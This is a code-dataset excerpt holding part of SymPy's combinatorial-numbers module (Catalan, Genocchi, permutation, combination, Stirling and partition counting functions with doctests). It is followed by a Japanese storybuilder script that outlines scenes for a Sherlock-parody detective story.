\\ n /\n\n * catalan(n) gives the n-th Catalan number, C_n\n\n Examples\n ========\n\n >>> from sympy import (Symbol, binomial, gamma, hyper, polygamma,\n ... catalan, diff, combsimp, Rational, I)\n\n >>> [ catalan(i) for i in range(1,10) ]\n [1, 2, 5, 14, 42, 132, 429, 1430, 4862]\n\n >>> n = Symbol(\"n\", integer=True)\n\n >>> catalan(n)\n catalan(n)\n\n Catalan numbers can be transformed into several other, identical\n expressions involving other mathematical functions\n\n >>> catalan(n).rewrite(binomial)\n binomial(2*n, n)/(n + 1)\n\n >>> catalan(n).rewrite(gamma)\n 4**n*gamma(n + 1/2)/(sqrt(pi)*gamma(n + 2))\n\n >>> catalan(n).rewrite(hyper)\n hyper((-n + 1, -n), (2,), 1)\n\n For some non-integer values of n we can get closed form\n expressions by rewriting in terms of gamma functions:\n\n >>> catalan(Rational(1,2)).rewrite(gamma)\n 8/(3*pi)\n\n We can differentiate the Catalan numbers C(n) interpreted as a\n continuous real funtion in n:\n\n >>> diff(catalan(n), n)\n (polygamma(0, n + 1/2) - polygamma(0, n + 2) + log(4))*catalan(n)\n\n As a more advanced example consider the following ratio\n between consecutive numbers:\n\n >>> combsimp((catalan(n + 1)/catalan(n)).rewrite(binomial))\n 2*(2*n + 1)/(n + 2)\n\n The Catalan numbers can be generalized to complex numbers:\n\n >>> catalan(I).rewrite(gamma)\n 4**I*gamma(1/2 + I)/(sqrt(pi)*gamma(2 + I))\n\n and evaluated with arbitrary precision:\n\n >>> catalan(I).evalf(20)\n 0.39764993382373624267 - 0.020884341620842555705*I\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Catalan_number\n .. [2] http://mathworld.wolfram.com/CatalanNumber.html\n .. [3] http://functions.wolfram.com/GammaBetaErf/CatalanNumber/\n .. 
[4] http://geometer.org/mathcircles/catalan.pdf\n\n See Also\n ========\n\n bell, bernoulli, euler, fibonacci, harmonic, lucas\n sympy.functions.combinatorial.factorials.binomial\n \"\"\"\n\n @classmethod\n def eval(cls, n):\n from sympy import gamma\n if (n.is_Integer and n.is_nonnegative) or \\\n (n.is_noninteger and n.is_negative):\n return 4**n*gamma(n + S.Half)/(gamma(S.Half)*gamma(n + 2))\n\n if (n.is_integer and n.is_negative):\n if (n + 1).is_negative:\n return S.Zero\n if (n + 1).is_zero:\n return -S.Half\n\n def fdiff(self, argindex=1):\n from sympy import polygamma, log\n n = self.args[0]\n return catalan(n)*(polygamma(0, n + Rational(1, 2)) - polygamma(0, n + 2) + log(4))\n\n def _eval_rewrite_as_binomial(self, n):\n return binomial(2*n, n)/(n + 1)\n\n def _eval_rewrite_as_factorial(self, n):\n return factorial(2*n) / (factorial(n+1) * factorial(n))\n\n def _eval_rewrite_as_gamma(self, n):\n from sympy import gamma\n # The gamma function allows to generalize Catalan numbers to complex n\n return 4**n*gamma(n + S.Half)/(gamma(S.Half)*gamma(n + 2))\n\n def _eval_rewrite_as_hyper(self, n):\n from sympy import hyper\n return hyper([1 - n, -n], [2], 1)\n\n def _eval_rewrite_as_Product(self, n):\n from sympy import Product\n if not (n.is_integer and n.is_nonnegative):\n return self\n k = Dummy('k', integer=True, positive=True)\n return Product((n + k) / k, (k, 2, n))\n\n def _eval_evalf(self, prec):\n from sympy import gamma\n if self.args[0].is_number:\n return self.rewrite(gamma)._eval_evalf(prec)\n\n\n#----------------------------------------------------------------------------#\n# #\n# Genocchi numbers #\n# #\n#----------------------------------------------------------------------------#\n\n\nclass genocchi(Function):\n r\"\"\"\n Genocchi numbers\n\n The Genocchi numbers are a sequence of integers G_n that satisfy the\n relation::\n\n oo\n ____\n \\ `\n 2*t \\ n\n ------ = \\ G_n*t\n t / ------\n e + 1 / n!\n /___,\n n = 1\n\n Examples\n ========\n\n >>> from sympy import Symbol\n >>> from sympy.functions import genocchi\n >>> [genocchi(n) for n in range(1, 9)]\n [1, -1, 0, 1, 0, -3, 0, 17]\n >>> n = Symbol('n', integer=True, positive=True)\n >>> genocchi(2 * n + 1)\n 0\n\n References\n ==========\n\n .. [1] https://en.wikipedia.org/wiki/Genocchi_number\n .. 
[2] http://mathworld.wolfram.com/GenocchiNumber.html\n\n See Also\n ========\n\n bell, bernoulli, catalan, euler, fibonacci, harmonic, lucas\n \"\"\"\n\n @classmethod\n def eval(cls, n):\n if n.is_Number:\n if (not n.is_Integer) or n.is_nonpositive:\n raise ValueError(\"Genocchi numbers are defined only for \" +\n \"positive integers\")\n return 2 * (1 - S(2) ** n) * bernoulli(n)\n\n if n.is_odd and (n - 1).is_positive:\n return S.Zero\n\n if (n - 1).is_zero:\n return S.One\n\n def _eval_rewrite_as_bernoulli(self, n):\n if n.is_integer and n.is_nonnegative:\n return (1 - S(2) ** n) * bernoulli(n) * 2\n\n def _eval_is_integer(self):\n if self.args[0].is_integer and self.args[0].is_positive:\n return True\n\n def _eval_is_negative(self):\n n = self.args[0]\n if n.is_integer and n.is_positive:\n if n.is_odd:\n return False\n return (n / 2).is_odd\n\n def _eval_is_positive(self):\n n = self.args[0]\n if n.is_integer and n.is_positive:\n if n.is_odd:\n return fuzzy_not((n - 1).is_positive)\n return (n / 2).is_even\n\n def _eval_is_even(self):\n n = self.args[0]\n if n.is_integer and n.is_positive:\n if n.is_even:\n return False\n return (n - 1).is_positive\n\n def _eval_is_odd(self):\n n = self.args[0]\n if n.is_integer and n.is_positive:\n if n.is_even:\n return True\n return fuzzy_not((n - 1).is_positive)\n\n def _eval_is_prime(self):\n n = self.args[0]\n # only G_6 = -3 and G_8 = 17 are prime,\n # but SymPy does not consider negatives as prime\n # so only n=8 is tested\n return (n - 8).is_zero\n\n\n#######################################################################\n###\n### Functions for enumerating partitions, permutations and combinations\n###\n#######################################################################\n\n\nclass _MultisetHistogram(tuple):\n pass\n\n\n_N = -1\n_ITEMS = -2\n_M = slice(None, _ITEMS)\n\n\ndef _multiset_histogram(n):\n \"\"\"Return tuple used in permutation and combination counting. Input\n is a dictionary giving items with counts as values or a sequence of\n items (which need not be sorted).\n\n The data is stored in a class deriving from tuple so it is easily\n recognized and so it can be converted easily to a list.\n \"\"\"\n if type(n) is dict: # item: count\n if not all(isinstance(v, int) and v >= 0 for v in n.values()):\n raise ValueError\n tot = sum(n.values())\n items = sum(1 for k in n if n[k] > 0)\n return _MultisetHistogram([n[k] for k in n if n[k] > 0] + [items, tot])\n else:\n n = list(n)\n s = set(n)\n if len(s) == len(n):\n n = [1]*len(n)\n n.extend([len(n), len(n)])\n return _MultisetHistogram(n)\n m = dict(zip(s, range(len(s))))\n d = dict(zip(range(len(s)), [0]*len(s)))\n for i in n:\n d[m[i]] += 1\n return _multiset_histogram(d)\n\n\ndef nP(n, k=None, replacement=False):\n \"\"\"Return the number of permutations of ``n`` items taken ``k`` at a time.\n\n Possible values for ``n``::\n integer - set of length ``n``\n sequence - converted to a multiset internally\n multiset - {element: multiplicity}\n\n If ``k`` is None then the total of all permutations of length 0\n through the number of items represented by ``n`` will be returned.\n\n If ``replacement`` is True then a given item can appear more than once\n in the ``k`` items. (For example, for 'ab' permutations of 2 would\n include 'aa', 'ab', 'ba' and 'bb'.) 
The multiplicity of elements in\n ``n`` is ignored when ``replacement`` is True but the total number\n of elements is considered since no element can appear more times than\n the number of elements in ``n``.\n\n Examples\n ========\n\n >>> from sympy.functions.combinatorial.numbers import nP\n >>> from sympy.utilities.iterables import multiset_permutations, multiset\n >>> nP(3, 2)\n 6\n >>> nP('abc', 2) == nP(multiset('abc'), 2) == 6\n True\n >>> nP('aab', 2)\n 3\n >>> nP([1, 2, 2], 2)\n 3\n >>> [nP(3, i) for i in range(4)]\n [1, 3, 6, 6]\n >>> nP(3) == sum(_)\n True\n\n When ``replacement`` is True, each item can have multiplicity\n equal to the length represented by ``n``:\n\n >>> nP('aabc', replacement=True)\n 121\n >>> [len(list(multiset_permutations('aaaabbbbcccc', i))) for i in range(5)]\n [1, 3, 9, 27, 81]\n >>> sum(_)\n 121\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Permutation\n\n See Also\n ========\n sympy.utilities.iterables.multiset_permutations\n\n \"\"\"\n try:\n n = as_int(n)\n except ValueError:\n return Integer(_nP(_multiset_histogram(n), k, replacement))\n return Integer(_nP(n, k, replacement))\n\n\n@cacheit\ndef _nP(n, k=None, replacement=False):\n from sympy.functions.combinatorial.factorials import factorial\n from sympy.core.mul import prod\n\n if k == 0:\n return 1\n if isinstance(n, SYMPY_INTS): # n different items\n # assert n >= 0\n if k is None:\n return sum(_nP(n, i, replacement) for i in range(n + 1))\n elif replacement:\n return n**k\n elif k > n:\n return 0\n elif k == n:\n return factorial(k)\n elif k == 1:\n return n\n else:\n # assert k >= 0\n return _product(n - k + 1, n)\n elif isinstance(n, _MultisetHistogram):\n if k is None:\n return sum(_nP(n, i, replacement) for i in range(n[_N] + 1))\n elif replacement:\n return n[_ITEMS]**k\n elif k == n[_N]:\n return factorial(k)/prod([factorial(i) for i in n[_M] if i > 1])\n elif k > n[_N]:\n return 0\n elif k == 1:\n return n[_ITEMS]\n else:\n # assert k >= 0\n tot = 0\n n = list(n)\n for i in range(len(n[_M])):\n if not n[i]:\n continue\n n[_N] -= 1\n if n[i] == 1:\n n[i] = 0\n n[_ITEMS] -= 1\n tot += _nP(_MultisetHistogram(n), k - 1)\n n[_ITEMS] += 1\n n[i] = 1\n else:\n n[i] -= 1\n tot += _nP(_MultisetHistogram(n), k - 1)\n n[i] += 1\n n[_N] += 1\n return tot\n\n\n@cacheit\ndef _AOP_product(n):\n \"\"\"for n = (m1, m2, .., mk) return the coefficients of the polynomial,\n prod(sum(x**i for i in range(nj + 1)) for nj in n); i.e. the coefficients\n of the product of AOPs (all-one polynomials) or order given in n. The\n resulting coefficient corresponding to x**r is the number of r-length\n combinations of sum(n) elements with multiplicities given in n.\n The coefficients are given as a default dictionary (so if a query is made\n for a key that is not present, 0 will be returned).\n\n Examples\n ========\n\n >>> from sympy.functions.combinatorial.numbers import _AOP_product\n >>> from sympy.abc import x\n >>> n = (2, 2, 3) # e.g. 
aabbccc\n >>> prod = ((x**2 + x + 1)*(x**2 + x + 1)*(x**3 + x**2 + x + 1)).expand()\n >>> c = _AOP_product(n); dict(c)\n {0: 1, 1: 3, 2: 6, 3: 8, 4: 8, 5: 6, 6: 3, 7: 1}\n >>> [c[i] for i in range(8)] == [prod.coeff(x, i) for i in range(8)]\n True\n\n The generating poly used here is the same as that listed in\n http://tinyurl.com/cep849r, but in a refactored form.\n\n \"\"\"\n from collections import defaultdict\n\n n = list(n)\n ord = sum(n)\n need = (ord + 2)//2\n rv = [1]*(n.pop() + 1)\n rv.extend([0]*(need - len(rv)))\n rv = rv[:need]\n while n:\n ni = n.pop()\n N = ni + 1\n was = rv[:]\n for i in range(1, min(N, len(rv))):\n rv[i] += rv[i - 1]\n for i in range(N, need):\n rv[i] += rv[i - 1] - was[i - N]\n rev = list(reversed(rv))\n if ord % 2:\n rv = rv + rev\n else:\n rv[-1:] = rev\n d = defaultdict(int)\n for i in range(len(rv)):\n d[i] = rv[i]\n return d\n\n\ndef nC(n, k=None, replacement=False):\n \"\"\"Return the number of combinations of ``n`` items taken ``k`` at a time.\n\n Possible values for ``n``::\n integer - set of length ``n``\n sequence - converted to a multiset internally\n multiset - {element: multiplicity}\n\n If ``k`` is None then the total of all combinations of length 0\n through the number of items represented in ``n`` will be returned.\n\n If ``replacement`` is True then a given item can appear more than once\n in the ``k`` items. (For example, for 'ab' sets of 2 would include 'aa',\n 'ab', and 'bb'.) The multiplicity of elements in ``n`` is ignored when\n ``replacement`` is True but the total number of elements is considered\n since no element can appear more times than the number of elements in\n ``n``.\n\n Examples\n ========\n\n >>> from sympy.functions.combinatorial.numbers import nC\n >>> from sympy.utilities.iterables import multiset_combinations\n >>> nC(3, 2)\n 3\n >>> nC('abc', 2)\n 3\n >>> nC('aab', 2)\n 2\n\n When ``replacement`` is True, each item can have multiplicity\n equal to the length represented by ``n``:\n\n >>> nC('aabc', replacement=True)\n 35\n >>> [len(list(multiset_combinations('aaaabbbbcccc', i))) for i in range(5)]\n [1, 3, 6, 10, 15]\n >>> sum(_)\n 35\n\n If there are ``k`` items with multiplicities ``m_1, m_2, ..., m_k``\n then the total of all combinations of length 0 hrough ``k`` is the\n product, ``(m_1 + 1)*(m_2 + 1)*...*(m_k + 1)``. When the multiplicity\n of each item is 1 (i.e., k unique items) then there are 2**k\n combinations. For example, if there are 4 unique items, the total number\n of combinations is 16:\n\n >>> sum(nC(4, i) for i in range(5))\n 16\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Combination\n .. 
[2] http://tinyurl.com/cep849r\n\n See Also\n ========\n sympy.utilities.iterables.multiset_combinations\n \"\"\"\n from sympy.functions.combinatorial.factorials import binomial\n from sympy.core.mul import prod\n\n if isinstance(n, SYMPY_INTS):\n if k is None:\n if not replacement:\n return 2**n\n return sum(nC(n, i, replacement) for i in range(n + 1))\n if k < 0:\n raise ValueError(\"k cannot be negative\")\n if replacement:\n return binomial(n + k - 1, k)\n return binomial(n, k)\n if isinstance(n, _MultisetHistogram):\n N = n[_N]\n if k is None:\n if not replacement:\n return prod(m + 1 for m in n[_M])\n return sum(nC(n, i, replacement) for i in range(N + 1))\n elif replacement:\n return nC(n[_ITEMS], k, replacement)\n # assert k >= 0\n elif k in (1, N - 1):\n return n[_ITEMS]\n elif k in (0, N):\n return 1\n return _AOP_product(tuple(n[_M]))[k]\n else:\n return nC(_multiset_histogram(n), k, replacement)\n\n\n@cacheit\ndef _stirling1(n, k):\n if n == k == 0:\n return S.One\n if 0 in (n, k):\n return S.Zero\n n1 = n - 1\n\n # some special values\n if n == k:\n return S.One\n elif k == 1:\n return factorial(n1)\n elif k == n1:\n return binomial(n, 2)\n elif k == n - 2:\n return (3*n - 1)*binomial(n, 3)/4\n elif k == n - 3:\n return binomial(n, 2)*binomial(n, 4)\n\n # general recurrence\n return n1*_stirling1(n1, k) + _stirling1(n1, k - 1)\n\n\n@cacheit\ndef _stirling2(n, k):\n if n == k == 0:\n return S.One\n if 0 in (n, k):\n return S.Zero\n n1 = n - 1\n\n # some special values\n if k == n1:\n return binomial(n, 2)\n elif k == 2:\n return 2**n1 - 1\n\n # general recurrence\n return k*_stirling2(n1, k) + _stirling2(n1, k - 1)\n\n\ndef stirling(n, k, d=None, kind=2, signed=False):\n \"\"\"Return Stirling number S(n, k) of the first or second (default) kind.\n\n The sum of all Stirling numbers of the second kind for k = 1\n through n is bell(n). The recurrence relationship for these numbers\n is::\n\n {0} {n} {0} {n + 1} {n} { n }\n { } = 1; { } = { } = 0; { } = j*{ } + { }\n {0} {0} {k} { k } {k} {k - 1}\n\n where ``j`` is::\n ``n`` for Stirling numbers of the first kind\n ``-n`` for signed Stirling numbers of the first kind\n ``k`` for Stirling numbers of the second kind\n\n The first kind of Stirling number counts the number of permutations of\n ``n`` distinct items that have ``k`` cycles; the second kind counts the\n ways in which ``n`` distinct items can be partitioned into ``k`` parts.\n If ``d`` is given, the \"reduced Stirling number of the second kind\" is\n returned: ``S^{d}(n, k) = S(n - d + 1, k - d + 1)`` with ``n >= k >= d``.\n (This counts the ways to partition ``n`` consecutive integers into\n ``k`` groups with no pairwise difference less than ``d``. See example\n below.)\n\n To obtain the signed Stirling numbers of the first kind, use keyword\n ``signed=True``. 
Using this keyword automatically sets ``kind`` to 1.\n\n Examples\n ========\n\n >>> from sympy.functions.combinatorial.numbers import stirling, bell\n >>> from sympy.combinatorics import Permutation\n >>> from sympy.utilities.iterables import multiset_partitions, permutations\n\n First kind (unsigned by default):\n\n >>> [stirling(6, i, kind=1) for i in range(7)]\n [0, 120, 274, 225, 85, 15, 1]\n >>> perms = list(permutations(range(4)))\n >>> [sum(Permutation(p).cycles == i for p in perms) for i in range(5)]\n [0, 6, 11, 6, 1]\n >>> [stirling(4, i, kind=1) for i in range(5)]\n [0, 6, 11, 6, 1]\n\n First kind (signed):\n\n >>> [stirling(4, i, signed=True) for i in range(5)]\n [0, -6, 11, -6, 1]\n\n Second kind:\n\n >>> [stirling(10, i) for i in range(12)]\n [0, 1, 511, 9330, 34105, 42525, 22827, 5880, 750, 45, 1, 0]\n >>> sum(_) == bell(10)\n True\n >>> len(list(multiset_partitions(range(4), 2))) == stirling(4, 2)\n True\n\n Reduced second kind:\n\n >>> from sympy import subsets, oo\n >>> def delta(p):\n ... if len(p) == 1:\n ... return oo\n ... return min(abs(i[0] - i[1]) for i in subsets(p, 2))\n >>> parts = multiset_partitions(range(5), 3)\n >>> d = 2\n >>> sum(1 for p in parts if all(delta(i) >= d for i in p))\n 7\n >>> stirling(5, 3, 2)\n 7\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Stirling_numbers_of_the_first_kind\n .. [2] http://en.wikipedia.org/wiki/Stirling_numbers_of_the_second_kind\n\n See Also\n ========\n sympy.utilities.iterables.multiset_partitions\n\n \"\"\"\n # TODO: make this a class like bell()\n\n n = as_int(n)\n k = as_int(k)\n if n < 0:\n raise ValueError('n must be nonnegative')\n if k > n:\n return S.Zero\n if d:\n # assert k >= d\n # kind is ignored -- only kind=2 is supported\n return _stirling2(n - d + 1, k - d + 1)\n elif signed:\n # kind is ignored -- only kind=1 is supported\n return (-1)**(n - k)*_stirling1(n, k)\n\n if kind == 1:\n return _stirling1(n, k)\n elif kind == 2:\n return _stirling2(n, k)\n else:\n raise ValueError('kind must be 1 or 2, not %s' % k)\n\n\n@cacheit\ndef _nT(n, k):\n \"\"\"Return the partitions of ``n`` items into ``k`` parts. This\n is used by ``nT`` for the case when ``n`` is an integer.\"\"\"\n if k == 0:\n return 1 if k == n else 0\n return sum(_nT(n - k, j) for j in range(min(k, n - k) + 1))\n\n\ndef nT(n, k=None):\n \"\"\"Return the number of ``k``-sized partitions of ``n`` items.\n\n Possible values for ``n``::\n integer - ``n`` identical items\n sequence - converted to a multiset internally\n multiset - {element: multiplicity}\n\n Note: the convention for ``nT`` is different than that of ``nC`` and\n ``nP`` in that\n here an integer indicates ``n`` *identical* items instead of a set of\n length ``n``; this is in keeping with the ``partitions`` function which\n treats its integer-``n`` input like a list of ``n`` 1s. 
One can use\n ``range(n)`` for ``n`` to indicate ``n`` distinct items.\n\n If ``k`` is None then the total number of ways to partition the elements\n represented in ``n`` will be returned.\n\n Examples\n ========\n\n >>> from sympy.functions.combinatorial.numbers import nT\n\n Partitions of the given multiset:\n\n >>> [nT('aabbc', i) for i in range(1, 7)]\n [1, 8, 11, 5, 1, 0]\n >>> nT('aabbc') == sum(_)\n True\n\n >>> [nT(\"mississippi\", i) for i in range(1, 12)]\n [1, 74, 609, 1521, 1768, 1224, 579, 197, 50, 9, 1]\n\n Partitions when all items are identical:\n\n >>> [nT(5, i) for i in range(1, 6)]\n [1, 2, 2, 1, 1]\n >>> nT('1'*5) == sum(_)\n True\n\n When all items are different:\n\n >>> [nT(range(5), i) for i in range(1, 6)]\n [1, 15, 25, 10, 1]\n >>> nT(range(5)) == sum(_)\n True\n\n References\n ==========\n\n .. [1] http://undergraduate.csse.uwa.edu.au/units/CITS7209/partition.pdf\n\n See Also\n ========\n sympy.utilities.iterables.partitions\n sympy.utilities.iterables.multiset_partitions\n\n \"\"\"\n from sympy.utilities.enumerative import MultisetPartitionTraverser\n\n if isinstance(n, SYMPY_INTS):\n # assert n >= 0\n # all the same\n if k is None:\n return sum(_nT(n, k) for k in range(1, n + 1))\n return _nT(n, k)\n if not isinstance(n, _MultisetHistogram):\n try:\n # if n contains hashable items there is some\n # quick handling that can be done\n u = len(set(n))\n if u == 1:\n return nT(len(n), k)\n elif u == len(n):\n n = range(u)\n raise TypeError\n except TypeError:\n n = _multiset_histogram(n)\n N = n[_N]\n if k is None and N == 1:\n return 1\n if k in (1, N):\n return 1\n if k == 2 or N == 2 and k is None:\n m, r = divmod(N, 2)\n rv = sum(nC(n, i) for i in range(1, m + 1))\n if not r:\n rv -= nC(n, m)//2\n if k is None:\n rv += 1 # for k == 1\n return rv\n if N == n[_ITEMS]:\n # all distinct\n if k is None:\n return bell(N)\n return stirling(N, k)\n m = MultisetPartitionTraverser()\n if k is None:\n return m.count_partitions(n[_M])\n # MultisetPartitionTraverser does not have a range-limited count\n # method, so need to enumerate and count\n tot = 0\n for discard in m.enum_range(n[_M], k-1, k):\n tot += 1\n return tot\n"} {"ext": "py", "sha": "1a2ec17c06808474025044eecb4c169d51620cd8", "content": "# -*- coding: utf-8 -*-\n'''\nStage: \"シャーロックの家\"\n'''\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), '../../..'))\nsys.path.append('storybuilder')\nfrom storybuilder.builder.world import World\n\n\n# NOTE\n# 物語が展開する中心。事務所\n# シャーロックが借りて住んでいる古い一軒家(二階建て)で、B221という看板が近くにある\n# 幽霊が出るといういわくつきの物件で安かった。原因は地場発生の魔石があっただけ\n# :2F\n# [物置][空き部屋]\n# [寝室1][寝室2]\n# :1F\n# [キッチン][バス]\n# [ダイニング][トイレ]\n# [研究室]\n# [リビング][書斎]\n\n\n# alias\nHOME = \"SherlockHouse\"\nLIVING = \"SherlockHouseLiving\"\nKITCHEN = \"SherlockHouseKitchen\"\nBATHROOM = \"SherlockHouseBathroom\"\nDINING = \"SherlockHouseDining\"\nLABO = \"SherlockHouseLabo\"\nREADING = \"SherlockHouseReadingRoom\"\nBEDROOM = \"SherlockHouseBedroom\"\nSTORAGE = \"SherlockHouseStorage\"\n\n\n## scenes\ndef about_sherlock(w: World):\n return w.scene(\"$sherlockという男について\",\n w.plot_note(\"知っていたならなぜ忠告してくれなかったんだ、と$wilsonが$sherlockに文句をいい、なんとか家に入れてもらえる\"),\n w.plot_note(\"中に入るとそこら中に本や資料がちらばっていた\"),\n w.plot_note(\"$wilsonはそこで依頼をしようと思ったが、\"),\n w.plot_note(\"そこに何も記載のない手紙が投げ込まれた\"),\n )\n\n\ndef read_prince_letter(w: World):\n return w.scene(\"皇太子の書簡の中身\",\n w.plot_note(\"手紙には独特の紙が使われていて、それが王室のものだと$sherlockは分かった\"),\n w.plot_note(\"中は皇太子からの手紙で、$sherlockに頼みごとが書かれていた\"),\n 
w.plot_note(\"皇太子は女遊びがひどくてその界隈では有名だが、今回ついに腰を落ち着けて結婚することになった\"),\n w.plot_note(\"相手は近隣の公国の王女で、政治的な意味合いも大きい\"),\n w.plot_note(\"その結婚に際して過去の女性関係をすべて綺麗にした\"),\n w.plot_note(\"ただある一人の女性にプレゼントしてしまった大切なナイフを返してもらいたいが、相手の女性が応じてくれない\"),\n w.plot_note(\"揉め事をおこしたくないので、穏便にすませたいから、$sherlockに彼女を説得して、ナイフを返してもらってくれないか、という依頼\"),\n w.plot_note(\"$sherlockはその依頼内容について、書かれていない部分の推測を述べる\"),\n w.plot_note(\"ナイフと書いているが、実際は王室に伝わる宝剣で、それが王の証の一つで、結婚の際には儀式内で使われる\"),\n w.plot_note(\"酒の勢いで大切な宝剣をあげてしまったのだろうと\"),\n w.plot_note(\"そんなものを取り戻す義理はないが、恩があるので仕方なく依頼を受けると言った\"),\n w.plot_note(\"$sherlockは$wilsonにその女性の家まで送ってほしいと頼んだ\"),\n )\n\n\ndef important_than_sword(w: World):\n return w.scene(\"宝剣より大事なこと\",\n w.plot_note(\"$sherlockは宝剣よりも殺人事件についての調査をしたいと、$wilsonを家に置いて出ていってしまう\"),\n w.plot_note(\"$wilsonは$sherlockの家に戻り、そこで彼を待つことにする\"),\n w.plot_note(\"やってきた若い刑事は$sherlockがいないことに落胆しつつも、状況を教えてくれる\"),\n w.plot_note(\"発見された遺体は一月ほど前に行方不明になった女性だった\"),\n w.plot_note(\"$ailyとは何の関係もなく、そこの接点も見つけられないと嘆く\"),\n w.plot_note(\"殺害方法も不明で、凶器すら見つけられないと\"),\n w.plot_note(\"そこに役所の男から$ailyという女性が住民登録をしたという形跡は見つけられなかったと連絡がきた\"),\n )\n\n\ndef housemate_mary(w: World):\n return w.scene(\"同居人$mary\",\n w.plot_note(\"同居するようになった$maryはやたらと$sherlockにまとわりつく\"),\n w.plot_note(\"$sherlockは大好きな読書もできず、困っていた\"),\n )\n\n\ndef mary_has_worry(w: World):\n return w.scene(\"$maryの悩み\",\n w.plot_note(\"$maryは彼の迷惑になりたくなくて、$wilsonに相談する\"),\n w.plot_note(\"女手が不足しているから自分が役立つところをアピールしてみたら、と助言を受ける\"),\n w.plot_note(\"$maryは掃除や買い物を買って出る\"),\n )\n\n\ndef about_missings(w: World):\n return w.scene(\"失踪者について\",\n w.plot_note(\"やっと外に出てくれてほっとした$sherlockは$wilsonに事件について相談する\"),\n w.plot_note(\"最近謎の失踪者が増えていた\"),\n w.plot_note(\"失踪事件として新聞や雑誌も特集を組んでいる\"),\n w.plot_note(\"$wilsonはその調査を$sherlockに依頼していたが、未だに何も情報がなかった\"),\n )\n\n\ndef strange_armor_knight(w: World):\n return w.scene(\"奇妙な鎧騎士\",\n w.plot_note(\"そこに$maryが見知らぬ人を連れて戻ってくる\"),\n w.plot_note(\"道端で困っていたから拾ったけれど言葉がしゃべれないのだと$maryは説明した\"),\n )\n\n\ndef strange_work(w: World):\n return w.scene(\"奇妙な仕事\",\n w.plot_note(\"その鎧騎士は$sherlockに$limeと名乗った(筆談で)\"),\n w.plot_note(\"彼女は今ある老夫婦の家に居候しているが、彼らの知人の質屋の護衛のアルバイトをしていた\"),\n w.plot_note(\"守衛仲間の$binsと交代しながら閉店時刻まで警備をしている\"),\n w.plot_note(\"その$binsから別のバイトを紹介され、今は途中にそちらもやっている\"),\n w.plot_note(\"その別のバイトが相談したいことだった\"),\n w.plot_note(\"最初に$binsからチラシを見せてもらったときには「赤い鎧の者だけがバイト資格がある」と書かれていた\"),\n w.plot_note(\"仕事内容はじっと座ってある本の写しを作る作業を三時間行うだけで、週給で結構な金額がもらえた\"),\n w.plot_note(\"実際に面接に行ってみると確かに赤い鎧を来た人間が集まっていたが、$limeみたいに見事に全身赤という者はいなかった\"),\n w.plot_note(\"主催者である赤鎧クラブは彼女を合格とし、その翌日から守衛を抜け出して三時間、そのアルバイトをしているらしい\"),\n w.plot_note(\"オーナー夫婦には申し訳なく感じているが、そのお金でプレゼントしたいと思っているのだと説明する\"),\n w.plot_note(\"その話をきいて$sherlockは彼女に今すぐそのアルバイトを辞めるようにとだけ言った\"),\n )\n\n\ndef reason_for_lime_work(w: World):\n return w.scene(\"$sherlockの忠告\",\n w.plot_note(\"家に帰った$maryはどうしてあんな風に言ったのか$sherlockに問いただす\"),\n w.plot_note(\"$sherlockはそんなにうまい話は存在しないし、自分が知る限り「赤鎧クラブ」なんてものは存在しないと断言する\"),\n w.plot_note(\"$maryは実際に持ち帰ったチラシを見せながら、彼女を拾ってくれたオーナーさんや同僚の$binsの優しさを力説する\"),\n w.plot_note(\"しかし後日$sherlockの言っていたように問題が発生する\"),\n w.plot_note(\"その近所にあった改装中の銀行が強盗に襲われた\"),\n w.plot_note(\"警備員が気づいて連絡したが、表からも裏からも誰も入ってはおらず、謎の強盗と話題になっていた\"),\n w.plot_note(\"しかし現地を調べたところ、抜け穴が掘ってあり、大量のダイヤと金塊が盗まれたあとだった\"),\n w.plot_note(\"しかもその抜け穴は質屋に繋がっていたのだ\"),\n w.plot_note(\"その質屋のオーナー夫婦も逮捕され、$limeも容疑者の一人として逮捕された\"),\n )\n\n\ndef help_lime_please(w: World):\n return w.scene(\"$limeを助けて\",\n w.plot_note(\"$maryが$limeを助けてやってほしいと$sherlockに言う\"),\n w.plot_note(\"$sherlockは自分の忠告を聞かなかったからだと言うが、それでも話だけは聞くと言う\"),\n w.plot_note(\"質屋につながっていた抜け穴の中で、重要参考人だった$ignesが遺体で発見された\"),\n 
w.plot_note(\"その容疑者として$limeが逮捕され、オーナー夫婦も事情聴取を受けている最中らしい\"),\n w.plot_note(\"強盗の件についても調査中で、全部彼女に押し付けられるかもしれないと言い出す\"),\n w.plot_note(\"$sherlockはその質屋に案内してもらう\"),\n )\n\n\ndef limes_talk_of_strange_case(w: World):\n return w.scene(\"奇妙な事件についての$limeの話\",\n w.plot_note(\"$maryが$limeを拾い、再び家へと連れてくる\"),\n w.plot_note(\"$sherlockは銀行から盗まれたものがダイヤだけじゃないと睨むが、教えてもらえなかった\"),\n w.plot_note(\"家に戻ってくると$sherlockはそこに$limeがいることに頭を抱える\"),\n w.plot_note(\"$limeがしゃべれないのは呪いの鎧のせいだと言う\"),\n w.plot_note(\"その呪いをといてもらおうと、知人の神官を読んでいた\"),\n w.plot_note(\"呪いを解いたが$limeはしゃべれないままだった\"),\n w.plot_note(\"その$limeは筆談で自分が王室の人間であると告白する\"),\n )\n\n\ndef lime_was_royal_family(w: World):\n return w.scene(\"$limeは王家の人間\",\n w.plot_note(\"$limeは自分が誘拐された訳ではなく、普通に家出をしたのだと告白する\"),\n w.plot_note(\"王室はそんな品の悪い発表をできないから失踪事件にして公表したのだと言った\"),\n w.plot_note(\"もともと妾の子で、周囲から浮いていて、王室にも自分の居場所がなく帰りたくないと泣く\"),\n )\n\n\ndef newcommer_lime(w: World):\n return w.scene(\"新しい同居人$lime\",\n w.plot_note(\"$maryは$sherlockに$limeを一緒に住まわせてほしいとお願いする\"),\n w.plot_note(\"$sherlockは金銭的な問題さえ解決できればと提案する\"),\n w.plot_note(\"$wilsonは金のことなら大丈夫だと、なぜか大金を手にして言う\"),\n w.plot_note(\"$wilsonは$sherlockの秘蔵コレクションを売り払っていた\"),\n w.plot_note(\"こうして新しい住人$limeをここに加えることになった\"),\n )\n\n\ndef cooker_lime(w: World):\n return w.scene(\"料理人$lime\",\n w.plot_note(\"$limeは料理担当になっていて、そのガチョウをもらってさばいてくれる\"),\n )\n\n\ndef marys_market_talk(w: World):\n return w.scene(\"$maryの市場の話\",\n 